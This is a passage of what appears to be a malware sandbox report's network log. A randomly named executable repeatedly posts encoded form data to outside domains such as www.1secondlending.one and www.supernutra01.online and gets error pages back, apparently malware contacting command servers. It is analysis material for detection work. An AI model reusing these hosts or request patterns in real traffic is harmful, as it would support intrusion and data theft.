                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.96451743.205.198.29806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:11.602024078 CET1758OUTPOST /6pwo/ HTTP/1.1
                                                  Host: www.1secondlending.one
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 1232
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.1secondlending.one
                                                  Referer: http://www.1secondlending.one/6pwo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 70 78 38 68 35 53 77 2f 4e 68 77 56 4e 68 70 4b 51 32 54 4a 50 78 31 6e 73 33 67 4f 41 69 63 6f 62 41 75 71 61 37 73 48 51 51 4e 7a 79 69 46 51 76 62 69 2b 39 2f 4b 37 72 47 51 56 4d 6d 73 70 42 79 54 65 73 53 7a 50 6f 6d 6f 4d 4b 55 72 52 73 41 4d 76 75 39 6d 71 4a 44 49 49 76 37 45 4a 4d 4f 6a 6a 76 54 79 59 51 76 61 63 51 75 6c 45 67 38 63 63 36 70 77 77 41 71 37 72 65 52 76 69 67 4e 62 45 63 64 63 69 77 59 65 61 4c 73 6c 50 46 51 65 4b 72 6d 7a 70 49 61 76 4e 6b 47 45 51 6c 52 4d 39 48 79 6e 48 76 54 6f 57 77 4e 6b 67 72 64 4a 71 55 4a 76 73 5a 74 70 79 41 33 59 54 58 57 5a 4a 4c 53 66 37 61 2b 73 73 31 4f 4e 5a 68 56 67 6c 41 73 57 30 56 74 76 77 63 58 70 76 47 54 7a 48 37 44 64 4b 45 37 6d 4e 33 61 44 57 32 6d 75 2f 54 6a 2b 71 66 36 4c 45 63 4b 2b 76 52 39 79 7a 57 75 34 35 45 4a 43 46 59 79 71 45 30 2b 44 52 6d 44 77 54 75 79 47 6f 4d 42 41 6c 73 41 56 35 45 51 71 57 54 74 68 52 71 56 65 6d 35 32 33 4d 6a 72 31 47 38 4f 78 58 4a 62 [TRUNCATED]
                                                  Data Ascii: rdmhfXe=DewrBs2mT9lmpx8h5Sw/NhwVNhpKQ2TJPx1ns3gOAicobAuqa7sHQQNzyiFQvbi+9/K7rGQVMmspByTesSzPomoMKUrRsAMvu9mqJDIIv7EJMOjjvTyYQvacQulEg8cc6pwwAq7reRvigNbEcdciwYeaLslPFQeKrmzpIavNkGEQlRM9HynHvToWwNkgrdJqUJvsZtpyA3YTXWZJLSf7a+ss1ONZhVglAsW0VtvwcXpvGTzH7DdKE7mN3aDW2mu/Tj+qf6LEcK+vR9yzWu45EJCFYyqE0+DRmDwTuyGoMBAlsAV5EQqWTthRqVem523Mjr1G8OxXJbM3cBPurlnLf6+Y5NMZdvyp3kF7qwAoqWFpPCa3wxqhkutS9jqCnSsJOxMTAlk1gCgTsXM6icbxZRWCdLH9RNvwvO/G4ZI8OvI8mD2frBDbc7F8ellOlTk2H2QlNcYJ9Nk/rF5FeIDnr9F0XSPoVSC1mDc93wBYnoBBgPcJGGcfqJyVw0rg0IokHFmgeoj7z6VHsg7dl1nyM3ZnNHwEf86VEx2Q9xO868xNNu6KJ4EIrCKwHbWygqjzvmEmCmw9+b1vIfEvII3JCg+V3DeyL/X6KSdAvg09D6Xlnkm1F/XgEv/Ig/nFJoG63U45Y2wZ0Ke91Gb7viz9GpwzRCO9Yzzx/4oynOARJap7KHGrzCVpODLGKQgM/jcsnMyiOqsU2p2hBRuNX4YYiseuJuldUzOnshWVe1W6vSfiIuncns8bk3RxaOX2R8YtgK1SwNipegjJUy19SpK7DfU9p2VXUAznZ2pGbp6iHxdr+9+4wnQbA9wvlRRQl4dqjiYKc0wMt/VY+az2G4fJt3ImBr+L6Xu9tYuoShTiy+fRfPdgaSYb3R5pHRF+86X5zvFNuyPg/inxNVzzKlV0rMpMp25S/WaRF1h1dy1YCfaXR4Ocj9fDxhkgOSzD6IoB+QPaS51HWnDQ8tbpAgNnLLPWyks9MS9CewAHSGaaEyTy [TRUNCATED]
                                                  Jan 10, 2025 20:11:12.451793909 CET691INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:12 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.96451843.205.198.29806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:14.143189907 CET445OUTGET /6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z HTTP/1.1
                                                  Host: www.1secondlending.one
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Jan 10, 2025 20:11:14.981031895 CET691INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Fri, 10 Jan 2025 19:11:14 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.964519188.114.97.3806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:20.030328989 CET724OUTPOST /rk61/ HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 196
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.supernutra01.online
                                                  Referer: http://www.supernutra01.online/rk61/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 31 4c 32 50 35 58 56 74 76 35 41 79 46 35 50 6e 72 62 43 54 6c 58 44 4c 36 6e 5a 47 4d 74 74 6f 45 73 39 75 79 4f 47 74 48 4f 59 70 6c 34 44 41 6a 7a 36 53 53 49 2f 69 58 42 75 30 71 41 71 2b 70 47 5a 57 2b 57 34 70 39 6e 63 50 42 62 62 64 37 35 51 49 51 6d 52 52 34 68 69 41 2f 6c 6c 7a 49 69 47 4b 2b 6c 4a 5a 4b 69 67 30 48 4f 49 76 46 36 34 6b 2f 4e 6e 36 69 4c 6d 73 5a 6c 44 35 47 4f 31 7a 33 48 37 69 66 74 53 31 44 71 33 4c 6e 57 74 36 45 53 75 55 6d 42 50 62 68 4f 6e 44 71 2b 5a 2b 48 48 6c 4d 63 65 66 57 78 59 64 57 41 2f 74 63 51 35 6c 32 6e 52 53 31
                                                  Data Ascii: rdmhfXe=1L2P5XVtv5AyF5PnrbCTlXDL6nZGMttoEs9uyOGtHOYpl4DAjz6SSI/iXBu0qAq+pGZW+W4p9ncPBbbd75QIQmRR4hiA/llzIiGK+lJZKig0HOIvF64k/Nn6iLmsZlD5GO1z3H7iftS1Dq3LnWt6ESuUmBPbhOnDq+Z+HHlMcefWxYdWA/tcQ5l2nRS1
                                                  Jan 10, 2025 20:11:20.709923029 CET1236INHTTP/1.1 405 Not Allowed
                                                  Date: Fri, 10 Jan 2025 19:11:20 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qzmw2iSHWoQna6S3A8h64mxO00eU51PIDVhyqFgCcHZtfNmv9tEdmzJ52BDZ3EteV5NkKgSgOUIyEQukkuILY%2Bqh0cvN4B%2FwGuxEfiYsJHdlzVFK2RjKFms8u8RdV%2F8PrUyh1zAgssbeCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef8e8af8043a5-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
                                                  Jan 10, 2025 20:11:20.709943056 CET119INData Raw: 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                  Data Ascii: ble MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.964520188.114.97.3806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:22.572251081 CET748OUTPOST /rk61/ HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 220
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.supernutra01.online
                                                  Referer: http://www.supernutra01.online/rk61/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 41 70 6c 64 2f 41 69 79 36 53 52 49 2f 69 66 68 75 74 30 77 71 44 70 47 64 65 2b 53 34 70 39 6a 30 50 42 66 58 64 37 4b 34 58 42 6d 52 66 78 42 69 56 69 56 6c 7a 49 69 47 4b 2b 6a 6c 2f 4b 69 6f 30 47 2b 34 76 58 76 59 6c 6a 64 6e 35 31 37 6d 73 64 6c 44 39 47 4f 31 56 33 46 65 48 66 75 71 31 44 76 4c 4c 70 6a 42 35 4c 53 75 53 37 78 4f 2f 78 63 6e 4c 68 4f 31 7a 49 42 78 72 45 2b 54 58 32 35 68 49 52 4e 6b 48 46 75 6c 52 67 32 62 64 37 45 76 4c 71 6e 61 6d 39 32 6f 38 6f 56 58 30 51 6a 58 4f 66 77 3d 3d
                                                  Data Ascii: rdmhfXe=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4Apld/Aiy6SRI/ifhut0wqDpGde+S4p9j0PBfXd7K4XBmRfxBiViVlzIiGK+jl/Kio0G+4vXvYljdn517msdlD9GO1V3FeHfuq1DvLLpjB5LSuS7xO/xcnLhO1zIBxrE+TX25hIRNkHFulRg2bd7EvLqnam92o8oVX0QjXOfw==
                                                  Jan 10, 2025 20:11:23.244344950 CET1236INHTTP/1.1 405 Not Allowed
                                                  Date: Fri, 10 Jan 2025 19:11:23 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuRmiHNNC%2BpjIkgYRoq6qz5RhQRZWIEkSG1UOPuzCyvrkEy6HPzPc62y0%2FoFgWdlZAERkhx%2BHu585m1AeEVEhdBu3trjZ2ATHIZstUcneOxv%2BTBs3YdwjidWfqeA3XB1dp6GVjTlO0uD5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef8f87ce64301-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1839&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=55&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to dis
                                                  Jan 10, 2025 20:11:23.244364977 CET120INData Raw: 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43
                                                  Data Ascii: able MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.964521188.114.97.3806568C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 10, 2025 20:11:25.120523930 CET1761OUTPOST /rk61/ HTTP/1.1
                                                  Host: www.supernutra01.online
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Accept-Encoding: gzip, deflate, br
                                                  Content-Length: 1232
                                                  Cache-Control: max-age=0
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.supernutra01.online
                                                  Referer: http://www.supernutra01.online/rk61/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                  Data Raw: 72 64 6d 68 66 58 65 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 49 70 6c 76 6e 41 6a 52 69 53 51 49 2f 69 56 42 75 77 30 77 71 53 70 47 6c 61 2b 53 39 53 39 6c 77 50 43 36 4c 64 39 37 34 58 49 6d 52 66 38 68 6a 79 2f 6c 6c 6d 49 69 57 4f 2b 6a 56 2f 4b 69 6f 30 47 39 67 76 48 4b 34 6c 68 64 6e 36 69 4c 6d 6f 5a 6c 44 5a 47 4f 74 72 33 46 62 79 44 4f 4b 31 44 50 37 4c 6c 78 35 35 47 53 75 51 72 68 4f 6e 78 63 71 56 68 4f 70 2f 49 42 74 52 45 38 44 58 31 50 46 55 4e 65 63 65 59 6f 68 56 72 42 72 56 7a 69 4c 31 71 32 37 41 68 44 4e 61 35 33 75 4c 64 53 6d 56 63 72 6e 6b 5a 48 30 75 49 53 35 56 52 52 54 4f 2b 54 57 77 31 4c 51 64 69 78 2b 6c 4b 62 55 2b 30 2b 4d 46 78 74 46 32 79 55 6e 4f 35 68 2b 44 4a 76 35 68 66 34 62 63 78 6c 5a 35 4f 54 72 55 4f 2f 71 79 30 4e 6b 77 31 6f 69 66 62 32 63 58 55 64 49 75 74 4c 6c 32 58 41 6c 52 76 64 61 32 65 2f 4a 66 63 62 6c 46 39 59 48 6c 7a 78 2b 56 69 6a 79 4a 66 41 78 5a 38 58 [TRUNCATED]
                                                  Data Ascii: rdmhfXe=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4IplvnAjRiSQI/iVBuw0wqSpGla+S9S9lwPC6Ld974XImRf8hjy/llmIiWO+jV/Kio0G9gvHK4lhdn6iLmoZlDZGOtr3FbyDOK1DP7Llx55GSuQrhOnxcqVhOp/IBtRE8DX1PFUNeceYohVrBrVziL1q27AhDNa53uLdSmVcrnkZH0uIS5VRRTO+TWw1LQdix+lKbU+0+MFxtF2yUnO5h+DJv5hf4bcxlZ5OTrUO/qy0Nkw1oifb2cXUdIutLl2XAlRvda2e/JfcblF9YHlzx+VijyJfAxZ8XxmxQPzZOZ4oulIsOOd7j3MMXh7K+1VyZxabsX248gTkW70v1FmtddmHRYff10kU2+f+gcD/vcDRoor/CGEJ2jPiGejvdHz3gyjhx0jC79xhVf+TnCGR38N6nTqsRcVT905r/T7JHFWY8lY1KSJPU4MW7WH35GTiB64fWXODpTETKdADoeZHwZ2WujWI/ZKFXmTPLvzHcSr9k0ONQgxqP5zGYOCNF7P7hxrE+BATUPdtPO1rSaYM8nZxtgMYuY7A9QERc9KuD7eP+yZJxYUAM6drzB2/ng/FdNdGgV9hmpf8whje1OcDhMAWb6uwO6VvWF9Fy//VZ376YVjk/hFgXMf1Ic2oqdgjTJ4/jTYE2O3SczpIWdNCxAEMZ87AysHYC4BGbR/z5aHTrx6C0feP/sPNdL0v7BNtaAft6s9clYh6fg4clisp8Wo9mTJARIRxxoq5lLMEdCu4dAcwVf4A7GJD+lcSJDKHcY/N16yhAE2v02HNRKInWWcwRSyixuX1+rffSIbpyfGhRCuAh3frPBZDXsofb2zYf/PBcEqVKhR0Z64gQ5Azb1609hFeqiA97lrUKtd7vu6ErlLHafMCV2rf7o5u7zqSmDhSf4I5GKICIJf9kzVvTrSsV5vSP3nWr8YTCZXfXS2jCojdoxLW6uqGyvc7CcNbVOA [TRUNCATED]
                                                  Jan 10, 2025 20:11:25.845640898 CET1236INHTTP/1.1 405 Not Allowed
                                                  Date: Fri, 10 Jan 2025 19:11:25 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U63tW9rf5%2BzeGccDaaT%2BUBmBq%2B5zYj62qAvC%2B%2FG0dpjZRFACWOR59PjSM2T86a4wewdoES%2FKYM3t1%2BZWz8W3YBvgmZ9FrEeQu9N5B%2F9j0Ut%2BTl2Fun%2FQpLVsu1I6OfyVStl2rh3u5BxGRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ffef908aff7de99-EWR
                                                  alt-svc: h3=":443"; ma=86400
